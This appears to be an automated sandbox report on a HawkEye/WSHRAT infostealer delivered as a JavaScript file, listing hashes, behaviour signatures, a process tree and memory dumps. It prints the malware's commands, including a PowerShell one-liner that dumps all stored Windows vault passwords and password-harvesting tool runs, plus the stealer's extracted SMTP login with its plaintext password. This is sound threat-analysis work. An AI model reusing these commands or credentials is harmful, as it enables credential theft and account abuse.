Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    29/09/2021, 03:07

General

  • Target

    Scano005110.js

  • Size

    5.2MB

  • MD5

    a3a411523aa5bf3818e8925e908be9a2

  • SHA1

    e356ce5f29c820c5fc7ca65c242be082bafc8fe8

  • SHA256

    052a6543d8392cf4c54e7f88f80b41f571ea4e937e3caa6fa9b42a860b40b30c

  • SHA512

    edd2647484ef73879e4c48f8e89f6166bdc73725b17b8a95d3522fbac9954749b93ddc9043a4c0db2e58de382b5a97a7d96ec3ebe7cd36ee7fd7ae6d78f42e88

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.legacypharma.com.pk
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    aurangzeb1926

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • NirSoft MailPassView 9 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 7 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 12 IoCs
  • Blocklisted process makes network request 18 IoCs
  • Executes dropped EXE 4 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 16 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scano005110.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Users\Admin\AppData\Local\Temp\fthost.exe
      "C:\Users\Admin\AppData\Local\Temp\fthost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Users\Admin\AppData\Roaming\Windows Update.exe
        "C:\Users\Admin\AppData\Roaming\Windows Update.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:736
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
          4⤵
            PID:1104
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1348
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
          C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3176
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3040
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3572
      • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
        "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
        2⤵
        • Executes dropped EXE
        PID:2308
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
        2⤵
          PID:1480
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
        1⤵
          PID:3948

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/736-121-0x0000000002B60000-0x0000000002B61000-memory.dmp

          Filesize

          4KB

        • memory/736-125-0x0000000002B61000-0x0000000002B62000-memory.dmp

          Filesize

          4KB

        • memory/736-126-0x0000000002B64000-0x0000000002B66000-memory.dmp

          Filesize

          8KB

        • memory/1104-127-0x0000000000400000-0x000000000041B000-memory.dmp

          Filesize

          108KB

        • memory/1104-123-0x0000000000400000-0x000000000041B000-memory.dmp

          Filesize

          108KB

        • memory/1348-128-0x0000000000400000-0x0000000000458000-memory.dmp

          Filesize

          352KB

        • memory/1348-130-0x0000000000400000-0x0000000000458000-memory.dmp

          Filesize

          352KB

        • memory/1912-117-0x00000000028D0000-0x00000000028D1000-memory.dmp

          Filesize

          4KB

        • memory/2412-145-0x000001EB61FE3000-0x000001EB61FE5000-memory.dmp

          Filesize

          8KB

        • memory/2412-153-0x000001EB7C2B0000-0x000001EB7C2B1000-memory.dmp

          Filesize

          4KB

        • memory/2412-155-0x000001EB61FE6000-0x000001EB61FE8000-memory.dmp

          Filesize

          8KB

        • memory/2412-144-0x000001EB61FE0000-0x000001EB61FE2000-memory.dmp

          Filesize

          8KB

        • memory/2412-143-0x000001EB7C310000-0x000001EB7C311000-memory.dmp

          Filesize

          4KB

        • memory/2412-146-0x000001EB61FF0000-0x000001EB61FF1000-memory.dmp

          Filesize

          4KB

        • memory/2412-138-0x000001EB7C160000-0x000001EB7C161000-memory.dmp

          Filesize

          4KB